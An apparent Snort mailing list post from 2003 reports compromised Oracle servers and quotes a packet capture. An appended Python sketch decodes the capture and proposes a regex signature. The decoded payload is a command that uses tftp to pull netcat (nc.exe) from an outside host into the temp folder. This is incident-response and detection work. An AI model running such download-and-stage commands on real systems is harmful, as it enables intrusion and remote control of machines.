Snort mailing list archives
Oracle Compromise (Tftp + Netcat)
From: "Dusty Hall" <halljer () auburn edu>
Date: Wed, 16 Apr 2003 08:57:57 -0500
Several of our Oracle systems were compromised last week and I'm curious to know if anyone else has been hit with this attack or could point me to the exploit information. I'm guessing it's "CERT Advisory CA-2003-05" but I'm not 100% sure. Any advice would be greatly appreciated.

Here's the payload (post compromise):

03:47:59.280516 <SOMEOTHERHOST>.4804 > <OURHOST>.1181: P 2735894114:2735894200(86) ack 1993726960 win 64208 (DF)
0x0000 4500 007e 6450 4000 7206 ca2e 3ea3 d5c5 E..~dP@.r...>...
0x0010 83cc 41c6 12c4 049d a312 6e62 76d5 dbf0 ..A.......nbv...
0x0020 5018 fad0 1aa0 0000 0056 0000 0600 0000 P........V......
0x0030 0000 07fe 4063 6d64 202f 6320 7466 7470 ....@cmd./c.tftp
0x0040 202d 6920 3632 2e31 3633 2e32 3133 2e31 .-i.XX.XXX.213.1
0x0050 3937 2067 6574 2077 696e 646f 7773 2f6e 97.get.windows/n
0x0060 6574 6361 742f 6e63 2e65 7865 2025 7465 etcat/nc.exe.%te
0x0070 6d70 255c 6e05 632e 6578 6500 0131 mp%\n.c.exe..1

Thanks,
-Dusty
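Added example, not part of the original post: a Python sketch that decodes the hex column of the capture above, strips the IP and TCP headers, and reassembles the command, showing why a contiguous content match on the local file name misses it. The function names and the regex signature are hypothetical, and the length-prefixed chunk layout after the 0xFE byte is an assumption read off this one capture.

```python
import re
import struct

# Hex column of the tcpdump output quoted in the post (offsets and ASCII column dropped).
DUMP = """
4500 007e 6450 4000 7206 ca2e 3ea3 d5c5
83cc 41c6 12c4 049d a312 6e62 76d5 dbf0
5018 fad0 1aa0 0000 0056 0000 0600 0000
0000 07fe 4063 6d64 202f 6320 7466 7470
202d 6920 3632 2e31 3633 2e32 3133 2e31
3937 2067 6574 2077 696e 646f 7773 2f6e
6574 6361 742f 6e63 2e65 7865 2025 7465
6d70 255c 6e05 632e 6578 6500 0131
"""

# Hypothetical signature for "cmd /c tftp -i <host> get <remote> <local>".
TFTP_GET = re.compile(
    rb"cmd(?:\.exe)?\s+/c\s+tftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.I)

def tcp_payload(pkt):
    """Return (sport, dport, payload) from a raw IPv4/TCP packet."""
    if pkt[0] >> 4 != 4 or pkt[9] != 6:
        raise ValueError("not IPv4/TCP")
    ihl = (pkt[0] & 0x0F) * 4                       # IP header length in bytes
    total = struct.unpack("!H", pkt[2:4])[0]        # IP total length
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    doff = (pkt[ihl + 12] >> 4) * 4                 # TCP header length in bytes
    return sport, dport, pkt[ihl + doff:total]

def dechunk(payload):
    """Join the length-prefixed chunks after the 0xFE byte (assumed layout)."""
    i = payload.find(b"\xfe") + 1                   # 0 when the marker is absent
    out = bytearray()
    while 0 < i < len(payload) and payload[i] != 0:
        n = payload[i]                              # one-byte chunk length
        out += payload[i + 1:i + 1 + n]
        i += 1 + n
    return bytes(out)

def analyze(dump=DUMP):
    sport, dport, payload = tcp_payload(bytes.fromhex("".join(dump.split())))
    m = TFTP_GET.search(dechunk(payload))
    return {
        "sport": sport, "dport": dport, "payload_len": len(payload),
        # The 0x05 length byte splits the file name in the raw payload.
        "raw_has_full_path": b"%temp%\\nc.exe" in payload,
        "remote": m.group(2).decode() if m else None,
        "local": m.group(3).decode() if m else None,
    }

if __name__ == "__main__":
    print(analyze())
```

The ports and payload length it recovers match the tcpdump summary line (4804 > 1181, 86 bytes); a content signature written against the raw stream should anchor on a substring that sits inside a single chunk rather than on the full local path.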